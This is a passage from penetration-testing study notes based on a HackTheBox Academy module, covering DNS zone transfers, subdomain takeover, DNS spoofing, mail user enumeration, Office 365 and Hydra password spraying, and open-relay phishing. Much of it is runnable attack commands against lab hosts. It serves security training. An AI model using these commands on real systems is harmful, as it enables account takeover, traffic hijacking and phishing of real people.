hostnames + IP scheme, unauthenticated 511 fierce --domain zonetransfer.me # automates AXFR across every discovered NS 512 ``` 513 514 **Subdomain enumeration → takeover.** A `CNAME` pointing at a deleted/expired third-party resource (an S3 bucket, a CDN endpoint) leaves the subdomain "dangling." Claim that resource and you control what the trusted subdomain serves — without ever touching the target's own DNS: 515 516 ```bash 517 ./subfinder -d inlanefreight.com -v # passive, OSINT-sourced — fast and quiet 518 host support.inlanefreight.com 519 # is an alias for inlanefreight.s3.amazonaws.com → visiting returns AWS "NoSuchBucket" 520 # register an S3 bucket named 'inlanefreight' ⇒ takeover 521 ``` 522 523 Check every third-party-hosted CNAME against **`can-i-take-over-xyz`** (catalogues which providers are currently vulnerable and how to claim each), or automate detection with **Nuclei**'s `subdomain-takeover` templates. Run passive enumeration (Subfinder) before active brute force (Subbrute/Sublist3r). 524 525 **Local DNS spoofing (Ettercap / Bettercap).** Strictly L2-adjacent, unlike the two vectors above. Poison the answer, then ARP-spoof yourself into the path: 526 527 ```bash 528 cat /etc/ettercap/etter.dns 529 # inlanefreight.com A 192.168.225.110 530 # *.inlanefreight.com A 192.168.225.110 531 # Ettercap: Hosts > Scan for Hosts → set victim=Target1, gateway=Target2 → Plugins > dns_spoof 532 ``` 533 534 **Bettercap** is the maintained, more scriptable successor to Ettercap and worth defaulting to for MITM/spoofing work. 535 536 --- 537 538 ## 10 · Attacking email services `fas:Terminal` — SMTP 25/465/587 · POP3 110/995 · IMAP 143/993 539 540 Email needs at least two protocols — SMTP for sending, POP3/IMAP for retrieval — and increasingly a cloud provider in front of both. The MX record decides the entire approach that follows. 541 542 <figure class="flow plate corners"> 543 <figcaption class="flow__cap"><span class="flow__kind">MX record decides the path</span><span class="flow__dir">TD</span></figcaption> 544 <div class="flow__body"> 545 <div class="flow__diagram" data-dir="td"> 546 <div class="flow-rank"><div class="flow-node is-entry">dig/host MX record</div></div> 547 <div class="flow-edge"></div> 548 <div class="flow-rank"><div class="flow-node is-decision">Cloud provider or self-hosted?</div></div> 549 <div class="flow-branches"> 550 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">self-hosted</span></div><div class="flow-node">nmap 25,110,143,465,587,993,995<span class="sub">VRFY/EXPN/RCPT · USER · open relay</span></div></div> 551 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Office 365</span></div><div class="flow-node">o365spray --validate → --enum → --spray<span class="sub">purpose-built, lockout-aware</span></div></div> 552 </div> 553 <div class="flow-join"></div> 554 <div class="flow-rank"><div class="flow-node is-goal">Mailbox access → search for 'password'</div></div> 555 </div> 556 </div> 557 </figure> 558 559 > [!info] MX reconnaissance first 560 > The MX record identifies who handles the domain's mail — Microsoft 365 (`*.mail.protection.outlook.com`), G-Suite (`aspmx.l.google.com`), Zoho (`mx.zoho.com`), or a self-hosted server. Each needs a completely different enumeration approach, so resolve it before anything else. 561 562 **MX + port enumeration:** 563 564 ```bash 565 host -t MX hackthebox.eu # aspmx.l.google.com → cloud (G-Suite) 566 dig mx inlanefreight.com | grep MX | grep -v ';' 567 host -t A mail1.inlanefreight.htb. # resolve the mail host, then scan it 568 sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128 569 # 25/tcp smtp Postfix smtpd · smtp-commands: ... VRFY ... ← VRFY present ⇒ user enum worth trying 570 ``` 571 572 **Manual SMTP username enumeration.** Three independent primitives — disabling one (commonly `VRFY`) doesn't close the others, so test all three: 573 574 ```bash 575 telnet 10.10.110.20 25 576 VRFY root # 252 = exists · 550 = unknown 577 EXPN support-team # expands a distribution list into member addresses (bigger leak) 578 MAIL FROM:john@inlanefreight.htb 579 RCPT TO:john # 250 = recipient ok · 550 = user unknown (hard to disable) 580 ``` 581 582 **POP3 user enumeration + automation:** 583 584 ```bash 585 telnet 10.10.110.20 110 586 USER john # +OK = valid · -ERR = invalid 587 smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 588 # john@inlanefreight.htb exists 589 ``` 590 591 **Office 365 enumeration and spraying.** Generic tools are blocked by Microsoft's throttling — use a purpose-built tool that respects lockout, and keep it current as MS changes endpoint behaviour: 592 593 ```bash 594 python3 o365spray.py --validate --domain msplaintext.xyz # is this domain even O365? 595 python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz # valid accounts, no password needed 596 python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz 597 # [VALID] julio@msplaintext.xyz:March2022! 598 ``` 599 600 **Password attacks against self-hosted mail (Hydra).** `-L users -p 'password'` sprays; swap the module name for `smtp`/`imap`: 601 602 ```bash 603 hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3 604 # [110][pop3] login: john password: Company01! 605 ``` 606 607 **Open relay abuse.** A relay that forwards mail from arbitrary sources without auth lets you send *as* any internal address — a phishing-as-trusted-sender capability, not just info disclosure: 608 609 ```bash 610 nmap -p25 -Pn --script smtp-open-relay 10.10.11.213 # Server is an open relay (14/16 tests) 611 swaks --from admin@company.com --to john@company.com \ 612 --header 'Subject: Company Notification' \ 613 --body 'Please complete this survey: http://phish/' --server 10.10.11.213 614 ``` 615 616 **OpenSMTPD RCE (CVE-2020-7247)** — concept only. Unauthenticated input during SMTP session composition (Source) is misparsed by OpenSMTPD's sender-field handler, which treats a `;` as a delimiter into shell execution rather than terminating the address (Process). Because OpenSMTPD binds a standardised port it runs as root (Privileges), so the smuggled 64-char-limited command executes as root and shells back out (Destination) — a clean reminder that a simple parsing bug in a root-owned, standard-port daemon is full unauthenticated RCE. 617 618 --- 619 620 ## 11 · Skills assessment `fas:Terminal` 621 622 The module closes with three Inlanefreight servers — Easy, Medium, Hard — each hiding an `HTB{...}` flag and requiring the whole module's toolkit against a target with no hints beyond a short business description. None of the three needs a novel technique; the assessment is proof the per-service checklists and the Concept-of-Attacks model generalise. 623 624 > [!info] Scenario briefs (read them like a scoping doc) 625 > - **Easy** — "manages emails, customers, and their files" → email + file share (SMB/FTP) enumeration first. 626 > - **Medium** — an internal `inlanefreight.htb` host that "stores emails and files... used relatively rarely... only for testing" → a probably-under-hardened box; prioritise default/test credentials. 627 > - **Hard** — an internal file/working-material server that also runs "a database... the purpose of which we do not know" → file-share enumeration chained into an unknown SQL database via credential reuse. 628 629 **Methodology for all three** — the brief itself is reconnaissance: 630 631 ```bash 632 sudo nmap -p- -sV -sC -T4 <TARGET_IP> -oN full_scan.txt 633 ``` 634 635 - `-p-` scans all 65535 ports, not the default top-1000 — non-negotiable on "internal / rarely used" hosts that frequently run services on non-standard ports. 636 - Then work each open port through its section above, **anonymous/null access first** (it's free), then default/weak creds, then known misconfigs, then version CVEs. 637 638 | Port | Apply | 639 |---|---| 640 | 21 (FTP) | §5 — anonymous login, brute force, CVEs | 641 | 139/445 (SMB) | §6 — null session, `smbclient -L`, `smbmap`, spray | 642 | 1433/3306 (SQL) | §7 — default/weak creds, `xp_cmdshell`, file r/w | 643 | 3389 (RDP) | §8 — spray, PtH if a hash is available | 644 | 53 (DNS) | §9 — zone transfer, subdomain enumeration | 645 | 25/110/143 (Mail) | §10 — user enumeration, open relay, spray | 646 647 **The connective tissue is credential reuse.** One confirmed credential set is worth testing against *every* discovered service immediately — `nxc`/`crackmapexec` share the same `-u`/`-p` syntax across `smb`, `mssql`, `ftp`, `ssh`, which is exactly what the Hard scenario (file server → unknown database) is built to test. 648 649 --- 650 651 ## Cross-service chaining — the whole point `fas:Lightbulb` 652 653 Individually, none of these services is a "vulnerability." Their value is how they chain: 654 655 1. **Anonymous/null first, everywhere.** FTP `ftp-anon`, SMB `-N`, mailbox `USER` probes — cheap, fast, non-destructive, and frequently the entire foothold. 656 2. **Everything is a candidate credential.** An empty filename, a config value, a mailbox string, a connection string in a binary → test it as a username *and* a password against every other service. 657 3. **Misconfig before CVE.** Default creds, anonymous auth, and exposed management interfaces land more boxes than memory-corruption bugs. Check them first. 658 4. **Hashes are as good as passwords.** A dumped SAM hash or a Responder-captured NetNTLMv2 is immediately actionable via Pass-the-Hash or relay — cracking is a bonus, not a requirement. 659 5. **Signing and lockout are the two flags to note during enumeration** — SMB `smb2-security-mode` decides whether relay is on the table; the account lockout policy decides how aggressively you can spray. 660 661 --- 662 663 ## References & sources `fas:BookOpen` 664 665 Distilled from the HackTheBox Academy **Attacking Common Services** module (CPTS path, module 11) and field-tested tooling notes. 666 667 1. [OWASP Top 10 · A05:2021 Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/) 668 2. [CVE-2022-22836 · CoreFTP arbitrary file write](https://nvd.nist.gov/vuln/detail/CVE-2022-22836) 669 3. [CVE-2020-0796 · SMBGhost](https://nvd.nist.gov/vuln/detail/CVE-2020-0796) 670 4. [CVE-2019-0708 · BlueKeep](https://nvd.nist.gov/vuln/detail/CVE-2019-0708) 671 5. [CVE-2020-7247 · OpenSMTPD RCE](https://nvd.nist.gov/vuln/detail/CVE-2020-7247) 672 6. [CVE-2021-44228 · Log4Shell](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) 673 7. [can-i-take-over-xyz · subdomain takeover reference](https://github.com/EdOverflow/can-i-take-over-xyz) 674 8. [Microsoft · xp_cmdshell (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql) 675 9. [NetExec (nxc) · documentation](https://www.netexec.wiki/) 676 10. [Impacket · Fortra/impacket](https://github.com/fortra/impacket) 677 678 > [!navigation] Keep going 679 > **Condensed card:** Attacking Common Services cheat sheet · **Field manual:** [Network Service Attack Manual](/sheets/pentest-workflow/network-service-attack-manual) · **Applications:** [Attacking Common Applications guide](/sheets/pentest-workflow/attacking-common-applications-guide) · **Credentials:** [Password Attacks & Credential Hunting](/sheets/pentest-workflow/password-attacks-and-credential-hunting) · **Dashboard:** [CPTS Workflow](/sheets/pentest-workflow/attack-flow-dashboard)